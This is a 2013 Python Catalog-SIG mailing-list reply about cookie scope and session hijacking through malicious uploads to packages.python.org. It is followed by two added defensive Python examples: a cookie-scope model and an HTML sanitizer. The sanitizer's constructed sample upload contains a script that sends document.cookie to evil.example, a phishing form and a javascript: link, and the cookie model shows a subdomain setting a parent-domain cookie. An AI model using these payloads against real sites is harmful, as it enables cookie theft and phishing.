On Feb 6, 2013, at 6:32 PM, Donald Stufft <[email protected]> wrote:
> On Wednesday, February 6, 2013 at 6:26 PM, [email protected] wrote:
>>>> No, it doesn't. Cookies for "python.org" are not available to
>>>> "packages.python.org".
>>>> It would have to be a cookie for ".python.org". We don't issue such
>>>> cookies.
>>>>
>>>> Regards,
>>>> Martin
>>>
>>> We probably will on the new site.
>>
>> How can you know already? It would be a mistake that's easy to avoid.
>>
> Doesn't matter either way, they are functionally equivalent.

We at the very least have to strip out JavaScript completely from uploads. And form elements; any browser things that allow local storage - the list goes on. Even if we don't have cookies on the main site, you can hijack sessions/cookies/etc. from *.python.org via a malicious upload. This probably includes the wiki.

This doesn't even touch on the fact that the PyPI mirrors need to have proper SSL security in place, lest different hijacking occurs as well.

> _______________________________________________
> Catalog-SIG mailing list
> [email protected]
> http://mail.python.org/mailman/listinfo/catalog-sig
_______________________________________________ Catalog-SIG mailing list [email protected] http://mail.python.org/mailman/listinfo/catalog-sig
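The cookie-scope rule the thread is arguing about ("python.org" versus ".python.org"), as an added example that is not code from the thread or from PyPI: a small model of the RFC 6265 storage and send rules, in Python since that is what PyPI is written in. The hostname evil.example, the cookie names and values, and the sequence of requests are constructed; the jar is simplified (no Path, Expires or Secure handling, and no replacement of same-name cookies).

```python
"""Added example, not code from the Catalog-SIG thread or from PyPI.
Models the RFC 6265 cookie rules for python.org / packages.python.org.
Hostnames, cookie names and values are constructed."""
import ipaddress
from dataclasses import dataclass


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 s5.1.3: identical, or cookie_domain is a '.'-delimited suffix
    of request_host (and request_host is not an IP literal)."""
    h, d = request_host.lower().rstrip("."), cookie_domain.lower().strip(".")
    return h == d or (h.endswith("." + d) and not is_ip(h))


@dataclass
class Cookie:
    name: str
    value: str
    domain: str
    host_only: bool   # no Domain attribute: sent to exactly one host (s5.3 step 6)
    http_only: bool   # HttpOnly: sent to the server but hidden from document.cookie


def store_cookie(jar: list, request_host: str, set_cookie: str) -> bool:
    """Store one Set-Cookie header or document.cookie assignment (RFC 6265 s5.3).
    Returns False when the Domain attribute is rejected."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name, _, value = parts[0].partition("=")
    domain, http_only = "", False
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        if k.lower() == "domain":
            domain = v.strip().lstrip(".").lower()   # a leading dot is ignored (s5.2.3)
        elif k.lower() == "httponly":
            http_only = True
    if domain and not domain_matches(request_host, domain):
        return False   # packages.python.org cannot set Domain=evil.example ...
    jar.append(Cookie(name, value, domain or request_host.lower(),
                      host_only=not domain, http_only=http_only))
    return True       # ... but Domain=python.org passes, and reaches every subdomain


def cookies_sent_to(jar: list, request_host: str) -> list:
    """RFC 6265 s5.4: host-only cookies need an exact host match, domain cookies
    use domain-match. That is the whole difference between the two spellings."""
    h = request_host.lower()
    return [c for c in jar
            if (c.domain == h if c.host_only else domain_matches(h, c.domain))]


def visible_to_script(jar: list, request_host: str) -> list:
    """What document.cookie returns to a script running on request_host."""
    return [c.name for c in cookies_sent_to(jar, request_host) if not c.http_only]


def cookie_demo() -> dict:
    jar = []
    # Constructed responses from the main site: one host-only, one site-wide.
    store_cookie(jar, "python.org", "session=s3cret; HttpOnly")
    store_cookie(jar, "python.org", "pref=dark; Domain=.python.org")
    # Script inside an upload served from packages.python.org tries two things.
    foreign = store_cookie(jar, "packages.python.org", "x=1; Domain=evil.example")
    tossed = store_cookie(jar, "packages.python.org",
                          "session=attacker; Domain=python.org")
    return {
        "packages_script_sees": visible_to_script(jar, "packages.python.org"),
        "python_org_receives": [(c.name, c.value)
                                for c in cookies_sent_to(jar, "python.org")],
        "foreign_domain_accepted": foreign,
        "parent_domain_accepted": tossed,
    }


if __name__ == "__main__":
    for key, val in cookie_demo().items():
        print(f"{key}: {val}")
```

Running `cookie_demo()` shows both halves of the argument at once: the host-only `session` cookie set by python.org never reaches packages.python.org, while the `Domain=.python.org` cookie does and is readable by script unless it is HttpOnly; and even with no shared cookies on the main site, script on packages.python.org may itself set a cookie for `Domain=python.org`, which python.org then receives next to its own `session` (the jar keeps both entries, as browsers do for a host-only and a domain cookie of the same name).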

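The strip-everything-active filter the reply calls for, as an added example that is not code from the thread or from PyPI: a Python `html.parser` pass that removes script, frames, plugins, form controls and event-handler or `javascript:` attributes from an uploaded HTML page before it is served from a python.org subdomain. The uploaded document, the hostname evil.example and the tag lists are constructed for the example.

```python
"""Added example, not code from the Catalog-SIG thread or from PyPI: remove
active content from an uploaded HTML page. The sample upload is constructed."""
import re
from html import escape
from html.parser import HTMLParser

STRIP_SUBTREE = {"script", "iframe", "object", "applet"}       # element and contents go
STRIP_TAG = {"form", "input", "button", "select", "textarea",  # element goes, text stays
             "embed", "meta", "base", "link"}
VOID = {"area", "br", "col", "hr", "img", "source", "track", "wbr"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
UNSAFE_SCHEME = re.compile(r"^(javascript|vbscript|data):")


class ActiveContentStripper(HTMLParser):
    """Rebuilds the document from parsed tokens, so nothing survives unless it
    is explicitly re-emitted (an allowlist, not a regex blocklist)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0   # skip > 0 while inside a stripped subtree

    def handle_starttag(self, tag, attrs):
        if tag in STRIP_SUBTREE:
            self.skip += 1
            return
        if self.skip or tag in STRIP_TAG:
            return
        kept = []
        for k, v in attrs:
            k, v = k.lower(), v or ""
            if k.startswith("on") or k == "style":   # event handlers, inline CSS
                continue
            # HTMLParser has already decoded entities, so "java&#x73;cript:"
            # arrives here as "javascript:"; embedded whitespace/controls go too.
            if k in URL_ATTRS and UNSAFE_SCHEME.match(
                    re.sub(r"[\s\x00-\x1f]", "", v).lower()):
                continue
            kept.append(f' {k}="{escape(v, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in STRIP_SUBTREE:
            self.skip = max(self.skip - 1, 0)   # unclosed <script> drops the rest: fail closed
            return
        if self.skip or tag in STRIP_TAG or tag in VOID:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))
    # Comments and <!DOCTYPE> hit the default no-op handlers and are dropped.


def strip_active_content(document: str) -> str:
    parser = ActiveContentStripper()
    parser.feed(document)
    parser.close()
    return "".join(parser.out)


UPLOADED = (  # constructed malicious "documentation" upload
    '<h1>Docs</h1>'
    '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
    '<form action="http://evil.example/phish"><input name="pw">Login</form>'
    '<a href="java&#x73;cript:alert(1)" onclick="steal()">link</a>'
    '<iframe src="http://evil.example/"></iframe><p>ok</p>'
)

if __name__ == "__main__":
    print(strip_active_content(UPLOADED))
```

Because the filter re-emits only what it recognises, an upload that leaves a `<script>` or `<iframe>` unclosed loses the rest of its body rather than having it leak through, and entity-encoded `javascript:` URLs are caught after decoding rather than by pattern-matching the raw bytes. It deliberately does not try to preserve `<style>` or CSS-driven behaviour, and it does nothing about the transport point in the message: a stripped page still has to be fetched from a mirror over properly verified SSL.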